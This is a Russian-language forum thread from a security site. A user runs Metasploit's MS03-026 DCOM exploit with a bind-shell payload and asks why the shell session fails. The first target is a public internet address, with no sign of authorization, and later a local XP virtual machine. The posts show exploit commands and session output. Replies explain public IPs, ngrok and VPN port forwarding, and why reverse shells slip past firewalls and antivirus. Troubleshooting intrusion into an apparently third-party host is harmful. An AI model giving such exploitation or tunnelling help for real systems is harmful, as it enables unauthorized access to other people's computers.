• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Нужен белый IP для эксплоита или нет?

wurdalak

Green Team
21.12.2019
18
2
BIT
0
Не прилетает meterpriter сессия создаётся. Нужен белый ip ?
Код:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit -j

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

msf5 exploit(windows/dcerpc/ms03_026_dcom) >

[*] 93.213.65.23:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...

[*] 93.213.65.23:135 - Binding to 5d9f4ab8-7d1c-14cf-861e-0020af6e8c57:0.0@ncacn_ip_tcp:93.213.65.23[135] ...

[*] 93.213.65.23:135 - Bound to 5d9f4ab8-7d1c-14cf-861e-0020af6e8c57:0.0@ncacn_ip_tcp:93.213.65.23[135] ...

[*] 93.213.65.23:135 - Sending exploit ...

[*] Started bind TCP handler against 93.213.65.23:135

[*] Command shell session 1 opened (0.0.0.0:0 -> 93.213.65.23:135) at 2020-10-03 14:57:58 +0700


msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -l


Active sessions

===============


  Id  Name  Type               Information  Connection

  --  ----  ----               -----------  ----------

  1         shell x86/windows               0.0.0.0:0 -> 93.213.65.23:135 (93.213.65.23)


msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -i 1

[*] Starting interaction with 1...

shell


[*] Trying to find binary(python) on target machine

[-] Session manipulation failed: undefined method `reverse!' for nil:NilClass ["C:/metasploit/apps/pro/vendor/bundle/ruby/2.6.0/

ork-5.0.97/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32'", "C:/metasploit/apps/pro/ etc...
Подскажите, что не так делаю.
 

Mogen

Red Team
27.08.2019
314
610
BIT
5
А где вы пытайтесь применить эксплоит?
Если вы атакуете машину в локальной сети, то белый ip не нужен.
 

wurdalak

Green Team
21.12.2019
18
2
BIT
0
В интернете не локалка. Для set PAYLOAD windows/shell_bind_tcp всётаки нужен белый ip ну или vpn ? я думал биндит на удалённой машине шелл или всётаки нужен белый ипишник?
 

Mogen

Red Team
27.08.2019
314
610
BIT
5
В интернете не локалка. Для set PAYLOAD windows/shell_bind_tcp всётаки нужен белый ip ну или vpn ? я думал биндит на удалённой машине шелл или всётаки нужен белый ипишник?
Посмотри в интернете про проброс портов с помощью ngrok. На ютуб канале codeby есть видео про это.
 
Последнее редактирование:

wurdalak

Green Team
21.12.2019
18
2
BIT
0
ну да с локалки. с роутера переадресацию на локальную тачку сделал и всё, но получаеться надо впн так ведь?
 

Mogen

Red Team
27.08.2019
314
610
BIT
5
ну да с локалки. с роутера переадресацию на локальную тачку сделал и всё, но получаеться надо впн так ведь?
Мне каюется, что дело может быть в metasploit. Смотрю на вывод ошибки, и думаю, что на машине жертвы что-то не установлено (python судя по ошибке msf) или что-то с ruby на вашей машине, но это врятли.
 

specical bat

Well-known member
17.10.2018
46
-1
BIT
0
Вроде как должен быть свой статический ip, или vpn с возможностью открытия портов. Подойдет vpn , там можно открыть порты от 1000. Если нужно ниже, то можно там же купить выделенный личный ip, при покупке от полугода. Если временной, на сутки версией пользуетесь, то после использования, нужно закрыть порт, который открыли.
 
05.10.2020
4
0
BIT
0
Вроде как должен быть свой статический ip, или vpn с возможностью открытия портов. Подойдет vpn , там можно открыть порты от 1000. Если нужно ниже, то можно там же купить выделенный личный ip, при покупке от полугода. Если временной, на сутки версией пользуетесь, то после использования, нужно закрыть порт, который открыли.
А как правильно пробросить все это дело к себе с впн?
 

BearSec

Platinum
20.04.2020
210
289
BIT
12
В интернете не локалка. Для set PAYLOAD windows/shell_bind_tcp всётаки нужен белый ip ну или vpn ? я думал биндит на удалённой машине шелл или всётаки нужен белый ипишник?
Варианты с белым ip или с использованием ngrok нужны при использовании reverse payload. Когда атакуемая машина, при успешном выполнении эксплоита, сама пытается к нам обратно подключится.

При успешной эксплотации и использовании bind payload атакуемая машина сама открывает у себя порт и ждёт, когда к ней кто-то подключится.

Чаще используют reverse, так как когда атакуемая машина сама подключается куда-то в интернет, фаерволы и антивирусы спокойнее к этому относятся, нежели когда непонятно кто лезет в неё из интернета (плюс надо понимать, что атакуемая машина может не иметь прямой доступ из интрнета, а сидит через шлюз и прочее прочее прочее...)

Вообще там еще есть отличия между windows/shell_bind_tcp и windows/shell/bind_tcp о них можно вот тут почитать
 

wurdalak

Green Team
21.12.2019
18
2
BIT
0
Хмм... в локалке на виртуалке с XP абсолютно такой же вывод
Код:
msf5 exploit(windows/dcerpc/ms03_026_dcom) >
[*] 192.168.1.8:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.1.8:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.8[135] ...
[*] 192.168.1.8:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.8[135] ...
[*] 192.168.1.8:135 - Sending exploit ...
[*] Started bind TCP handler against 192.168.1.8:135
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.8:135) at 2020-10-09 15:08:01 +0700

msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions 1
[*] Starting interaction with 1...
тоже IP понулям куда реверсит 0.0.0.0:0 , что за х.......я?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!